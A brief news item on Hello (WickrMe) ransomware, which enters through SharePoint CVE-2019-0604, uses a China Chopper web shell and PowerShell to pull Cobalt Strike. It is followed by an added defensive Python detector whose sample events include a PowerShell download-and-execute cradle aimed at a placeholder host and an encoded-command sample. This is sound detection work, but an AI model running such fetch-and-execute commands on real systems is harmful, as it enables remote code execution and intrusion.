Cybercrime, Hello ransomware uses China Chopper web shell vulnerability

Trend Micro: Hello ransomware uses an updated China Chopper web shell. The malware (aka WickrMe) arrives via CVE-2019-0604; the threat actors then use the web shell to download Cobalt Strike.

Hello ransomware (aka WickrMe) now uses an updated China Chopper web shell, Trend Micro's cybersecurity researchers have discovered. The malware arrives on a target system through the Microsoft SharePoint vulnerability CVE-2019-0604. The cybercrime actors then use Cobalt Strike to pivot to the domain controller and launch their attacks. Specifically, the China Chopper web shell is deployed to execute PowerShell commands, which in turn download a Cobalt Strike beacon; this leads to infection of the targeted system with the ransomware payload. Moreover, the exploit is available for free on one forum. Once the machine has been infected, all files are encrypted and can no longer be accessed or opened. Furthermore, additional password-stealing trojans and other malware can be installed alongside it.
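As an added illustration (not part of the Trend Micro report or of this article), the following Python script shows the kind of check a defender can run over process-creation logs to catch the step described above: a web server worker process spawning PowerShell that fetches a remote payload. The log format, field names and sample events are constructed for this example, and the assumption that a SharePoint web shell executes its commands under the IIS worker process w3wp.exe is this example's own.

```python
"""Added example, not the page's or Trend Micro's code.

Flags process-creation events in which an IIS worker process (w3wp.exe, an
assumption about where a SharePoint web shell runs) spawns PowerShell or a
command shell, and rates the event higher when the PowerShell command line
carries a download cradle or an encoded command.
"""
import re
from typing import Dict, List, Optional

# Constructed sample events; "parent" is the parent image, "image" the child.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "sp01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "
                "\"IEX (New-Object Net.WebClient).DownloadString("
                "'http://example.invalid/b')\""},
    {"host": "sp01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "ws42", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"host": "sp01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgA"},
]

# Parent processes that should never launch interactive shells (assumption).
WEB_SERVER_PARENTS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download primitives, matched case-insensitively.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand as a standalone switch.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Rate one process-creation event; None means nothing suspicious."""
    parent = basename(event["parent"])
    image = basename(event["image"])
    cmd = event.get("cmdline", "")
    if parent not in WEB_SERVER_PARENTS:
        return None
    if image in SHELLS:
        if DOWNLOAD_CRADLE.search(cmd):
            severity, reason = "high", "web server spawned PowerShell download cradle"
        elif ENCODED_FLAG.search(cmd):
            severity, reason = "high", "web server spawned encoded PowerShell command"
        else:
            severity, reason = "medium", "web server spawned PowerShell"
    elif image == "cmd.exe":
        severity, reason = "medium", "web server spawned command shell"
    else:
        severity, reason = "low", "web server spawned unexpected child process"
    return {"host": event["host"], "severity": severity,
            "reason": reason, "cmdline": cmd}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a batch of events and keep only the alerts."""
    return [alert for alert in (classify(e) for e in events) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['host']}: {alert['reason']} :: {alert['cmdline']}")
```

In a real deployment the parent/child fields would come from Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled; the rule deliberately keys on the parent process rather than on any signature of the web shell itself, since a web shell can be renamed or re-encoded but still has to run its commands from inside the web server's process.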